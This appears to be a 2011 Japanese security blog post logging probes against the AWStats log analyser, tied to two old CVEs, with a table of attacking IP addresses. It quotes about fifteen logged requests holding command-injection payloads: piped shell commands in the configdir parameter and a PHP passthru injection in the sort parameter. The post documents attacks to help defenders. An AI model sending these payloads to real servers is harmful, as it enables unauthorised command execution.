cNotes 検索 一覧 カテゴリ

最近のアクセスログ - awstatへの攻撃

Published: 2011/12/28

これも多いです。

このへんですかね?

  • CVE-2005-0116
  • CVE-2008-3922

狙われているのは古めの脆弱性。

昔からawstatが動いているけど放置されたままのサーバーやVPS利用者は多そうですから、狙い目なのかもしれません。

たしかに最近のdrive-byを利用した攻撃等でマルウェアや攻撃スクリプトの設置場所にawstatがある例が多々あるのですが、それとリンクしているのかもしれません。

(awstatのお陰でマルウェア配付の統計情報が見えるので便利なのですが。。。。。)

リクエスト内容はこのような感じ。

 /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
 /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
 /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
 /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
 /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo|
 /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
 /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
 /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
 /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
 /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
 /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
 /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
 /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
 /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
 /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|

攻撃元は同じくアジア(珍しくドイツが一つ)。一連の攻撃は同じ攻撃元なのでしょう。

IPnameASAS name
202.100.80.21NONE4134CHINANET-BACKBONE_No.31Jin-rong_StreetCN
59.108.108.100NONE4847CNIX-AP_China_Networks_Inter-ExchangeCN
203.72.59.6NONE1659ERX-TANET-ASN1_Tiawan_Academic_Network_(TANet)_Information_CenterTW
188.40.106.11nps1.newsletter-providing.com.24940HETZNER-AS_Hetzner_Online_AG_RZDE

[カテゴリ:botnet観察日記]

by jyake